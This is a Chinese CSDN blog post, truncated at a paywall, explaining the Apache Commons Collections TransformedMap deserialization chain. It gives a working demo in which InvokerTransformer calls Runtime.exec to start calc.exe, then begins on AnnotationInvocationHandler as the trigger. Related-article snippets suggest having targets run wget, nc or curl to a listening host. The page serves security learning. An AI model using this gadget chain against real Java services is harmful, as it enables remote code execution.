java安全(八)TransformedMap构造POC

已于 2022-08-06 06:23:29 修改
阅读量1.2k 收藏
点赞数 1
分类专栏: Java安全 文章标签: java 安全 安全漏洞 信息安全
于 2022-07-31 15:47:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45694388/article/details/124529538
版权
本文深入解析了如何构造一个基于TransformedMap的Java安全漏洞POC,涉及AnnotationInvocationHandler类的利用,解释了为何在高版本Java中无法利用此漏洞,并给出了完整的代码示例。
摘要由CSDN通过智能技术生成

给个关注?宝儿!
给个关注?宝儿!
给个关注?宝儿!

上一篇构造了一个了commons-collections的demo
【传送门】

package test.org.vulhub.Ser;



import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.util.HashMap;
import java.util.Map;

public class CommonCollections1 {
   
    public static void main(String[] args) throws Exception {
   
        Transformer[] transformers = new Transformer[]{
   
                new ConstantTransformer(Runtime.getRuntime()),
                new InvokerTransformer("exec", new Class[]{
   String.class},
                        new Object[]
                                {
   "C:\\WINDOWS\\system32\\calc.exe"}),
        };

        Transformer transformerChain = new
                ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        Map outerMap = TransformedMap.decorate(innerMap, null,
                transformerChain);
        outerMap.put("test", "xxxx");
    }
}

了解了Transformer,接下来尝试构建poc

AnnotationInvocationHandler

这个漏洞核心,是想Map中加一个新的元素,在demo中,我们通过手工执行 outerMap.put(“test”, “xxxx”); 来出发漏洞。但是在实际反序列化中,还需要有一个雷,使他在反序列化readObject中有类似写入的操作

就是:sun.reflect.annotation.AnnotationInvocationHandler

AnnotationInvocationHandler的 readObject方法:

private void readObject(java.io.ObjectInputStream s) 
	throws java.io.IOException, ClassNotFoundException {
    
	s.defaultReadObject()

	// Check to make sure that types have not evolved incompatibly
最低0.47元/天 解锁文章
b1gpig安全
关注
专栏目录
java poc_无回显命令执行PoC编写指南(Apache Shiro Java反序列化)
weixin_32058991的博客
02-16 710
无回显漏洞存在与否,无法从web获取到标志性的信息,Java反序列化漏洞即属于该类型。验证方法针对无回显的命令执行漏洞,让目标机执行wget、nc或者curl等命令,然后在公网主机监听对应的端口,通过日志来判断命令是否被执行。该方法可行,不过缺陷有以下几点:修改了目标机的文件系统不具有通用性,如windows没有nc、linux没有wget的情况。涉及到TCP数据传输,执行速度慢一种更好的方式是使...
java安全(七) 反序列化3 CC利用链 TransformedMap版
weixin_45694388的博客
04-21 3676
给个关注?宝儿! 给个关注?宝儿! 给个关注?宝儿! 关注公众号:b1gpig信息安全,文章推送不错过 众所周知,CommonCollections利⽤链是作为反序列化学习不可绕i过的一关 图解 先挂一张wh1te8ea的利用链图解,非常直观! 代码demo 分析: 代码使用了phith0n大佬的代码,对原本复杂的源码进行了优化,适合复现以及更加深刻理解 demo代码: package test.org.vulhub.Ser; import org.apache.commons.collecti.
java-poc:概念证明和Java技巧
04-30
注意: : 优先级警告...使用 Khallware(Java概念验证) 概述 这是一些用Java编写的简单,独立的概念证明。 主题包括: -简单的Java构造,data_types和语言功能 -通用软件设计模式 -计算机科学算法 -各种核心Java技术 -j2ee技术的各种子集 -通用Java
java poc_spring系列cve poc编写
weixin_33880392的博客
02-13 1177
本来是自己写在有道云笔记的,存粹是为了练习下python代码,也懒得打码了就是自己搭建的个漏测环境,师傅们手下留情.0x01 cve-2018-12731.1 漏洞检测访问目标/users?page=&size=5抓包,修改post包POST /users?page=&size=5 HTTP/1.1Host: 49.235.54.135:24814User-Agent: Mozil...
手把手教你写JAVA反序列化的POC
Ms08067安全实验室
07-20 2095
0x01 前言前面,我们了解了java的序列化机制,也知道在什么情况下会出现漏洞,为了对反序列化漏洞有个更直观的认识,这里就来说一说存在于apache commons-collectio...
java 反序列化CC1链分析(TransformedMap)
wsitcj的博客
03-14 1520
Map类 --> TransformedMap Map类是存储键值对的数据结构。 Apache Commons Collections中实现了TransformedMap ,该类可以在一个元素被添加/删除/或是被修改时会调用transform方法自动进行特定的修饰变换,具体的变换逻辑由Transformer类定义。也就是说,TransformedMap类中的数据发生改变时,可以自动对进行一些特殊的变换,比如在数据改变时,进行一些我们提前设定好的操作。 TransformedMap.decorate方法
java安全 反序列化(二)
sechelper的博客
12-07 643
java反射,CC6链源码分析,LazyMap利用连,ysoserial工具
Java Apache中的高危漏洞复现
tpaer的博客
08-12 1523
在15年Apache Commons Collections(ACC)被两位黑客爆出存在`反序列化漏洞`,由于Apache下的其他框架也免不了大量使用像List、Map、Set等Collection类,因此该漏洞覆盖范围非常之大。并且通过此漏洞可以执行任意操作,也是当年最危险的漏洞之一。...
Java反序列化漏洞Apache CommonsCollections分析
洋洋的小黑屋
05-17 556
Java反序列化漏洞Apache CommonsCollections分析 cc链,既为Commons-Collections利用链。此篇文章为cc链的第一条链CC1。而CC1目前用的比较多的有两条链,LazyMap和TransformedMap。在ysoserial工具中,利用的是LazyMap链,而我们此篇分析的则是TransformedMap链。 1.本文所需前置知识 java反序列化基础...
Java代码审计——Commons Collections TransformedMap调用链
王嘟嘟的博客
11-05 937
0x00 前言 CC链最基础的就是迭代链:Java代码审计——Commons Collections 迭代调用链,核心就是 ChainedTransformer的Transformer方法。那么TransformedMap就是可以调用此方法的一条链。 0x01 TransformedMap调用链 在CC包中, 有TransformedMap这样一个类,他在进行put,checkSetValue等方法时,可以触发transform方法,如下图所示。 1. 先上pocTransformer[] trans
POC编写指南
03-27
转载自Medici.Yan,以真实案例为背景,针对当下主流的漏洞来分析漏洞,并且一步一步编写对应的 PoC
直播预告 | 今晚8点 1小时教会使用Java编写POC
Ms08067安全实验室
01-07 151
— 实验室旗下直播培训课程 —来和20000+位同学加入MS08067一起学习吧!
poc框架及poc编写
weixin_48776804的博客
07-24 840
poc框架及poc编写1 pocassist2 pocsuite33 主要是两个框架,第一个相对好用一点 1 pocassist 2 pocsuite3 3 其他poc https://hub.fastgit.org/WooYun/TangScan
java反序列化漏洞 poc_Java反序列化漏洞详解
weixin_39812142的博客
02-13 1029
Java反序列化漏洞从爆出到现在快2个月了,已有白帽子实现了jenkins,weblogic,jboss等的代码执行利用工具。本文对于Java反序列化的漏洞简述后,并对于Java反序列化的Poc进行详细解读。Java反序列化漏洞简介· Java序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中,Java中的ObjectOutputStream类的writeObject()方法可以实现序列...
POC原型开发:巡店
杨江的IT分享专栏
10-03 3132
一期工作结束,结果见这里工作列表:1.首页导航2.我的GPS位置3.GPS签到,签出4.连续GPS跟踪5.拍照,上传6.图片列表7.任务下发8.任务接受9.任务反馈(反馈信息,完成状态)7.登录,退出============================================================技术要求:支持目前市场上销售的BlackBerry OS 7.1手机,比如990
反序列化基础知识
最新发布
why811的博客
08-15 87
实现了接口的类,还可以定义如下方法(反序列化魔术方法,自定义序列化。,自定义反序列化。。,写入时替换对象。。/*** 自定义反序列化类对象* @param ois 反序列化输入流对象* @throws IOException IO异常* @throws ClassNotFoundException 类未找到异常*/// 调用ObjectInputStream默认反序列化方法// 省去调用自定义反序列化逻辑.../*** 自定义序列化类对象。
transform TransformedMap利用链
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
01-25 593
引入环境: <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collections4</artifactId> <version>4.0</version> </dependency> <dependency> <groupId>commons-collectio
Java开发常见专业术语
热门推荐
weixin_42408447的博客
05-10 1万+
1.脚本 脚本(Script),是使用一种特定的描述性语言,依据一定的格式编写的可执行文件。 2.http协议 HTTP协议,即超文本传输协议(Hyper text transfer protocol)。是一种详细规定了浏览器和万维网(WWW = World Wide Web)服务器之间互相通信的规则,通过因特网传送万维网文档的数据传送协议。 3.B/S结构和C/S结构 B/S(Browser/Server):指浏览器和服务器架构。 C/S(Client/Server):指客户端和服务器架构 4.报文 报文
Apache commons-collections反序列化漏洞(TransformedMap利用链)
qq_43936524的博客
04-10 595
文章目录Commons-collections概述InvokerTransformer反射触发ChainedTransformer遍历触发封装为TransformedMap寻找ReadObject触发点AnnotationInvocationHandler触发(JDK1.7)BadAttributeValueExpException(JDK1.8) Commons-collections概述 官网对Commons-collections的说明 Java commons-collections是JDK 1.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

b1gpig安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值